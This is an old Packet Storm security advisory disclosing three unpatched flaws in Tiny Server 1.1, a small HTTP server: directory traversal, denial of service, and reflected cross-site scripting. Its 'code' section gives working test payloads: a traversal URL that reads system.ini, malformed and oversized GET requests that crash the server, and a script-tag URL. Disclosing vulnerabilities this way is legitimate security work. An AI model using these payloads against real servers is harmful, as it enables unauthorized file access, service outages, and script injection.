tinyServer1.1.txt

2004-01-26T00:00:00
ID PACKETSTORM:32561
Type packetstorm
Reporter Donato Ferrante
Modified 2004-01-26T00:00:00

Description

                                        
                                            ` Donato Ferrante  
  
  
Application: Tiny Server   
http://sourceforge.net/projects/tinyserver  
  
Version: 1.1 (1.0.5)  
  
Bugs: Multiple Vulnerabilities  
  
Author: Donato Ferrante  
e-mail: fdonato@autistici.org  
web: www.autistici.org/fdonato  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
1. Description  
2. The bugs  
3. The code  
4. The fix  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
----------------  
1. Description:  
----------------  
  
Vendor's Description:  
  
"This is a very basic http server. This server can accept multiple  
requests at once. The server is only 56 kb. The server has been  
configured to accept a maximum of 100 connections.  
As of now Tiny Server supports only the GET request."  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
-------------  
2. The bugs:  
-------------  
  
[1] directory traversal bug: the program does't make a good check on  
the user input string ( /../ ) so an attacker is able to see and  
download all the files on the remote system simply using his  
browser.  
  
[2] denial of service bug: the program have no checks on the input  
strings received, so an attacker is able to crash the server  
simply sending a crafted string.  
  
[3] cross site scripting bug: the program doesn't make a full check  
on the strings sent by the client, in fact the input strings are  
not filtered and they will appear in the returned page.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
-------------  
3. The code:  
-------------  
  
The following are some examples to test the vulnerabilities:  
  
  
[1]  
  
http://[host]/../../windows/system.ini  
  
  
  
[2]  
  
GET /index.htm  
( without specify HTTP/1.1 )  
  
or simply:  
  
index.htm  
( without specify GET and HTTP/1.1 )  
  
or:  
  
GET /aaaaaa[ 260 of a ]aaa HTTP/1.1  
  
  
  
[3]  
  
http://[host]/<script>alert("Test")</script>  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
------------  
4. The fix:  
------------  
  
No fix.  
The vendor has not answered to my signalations.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
`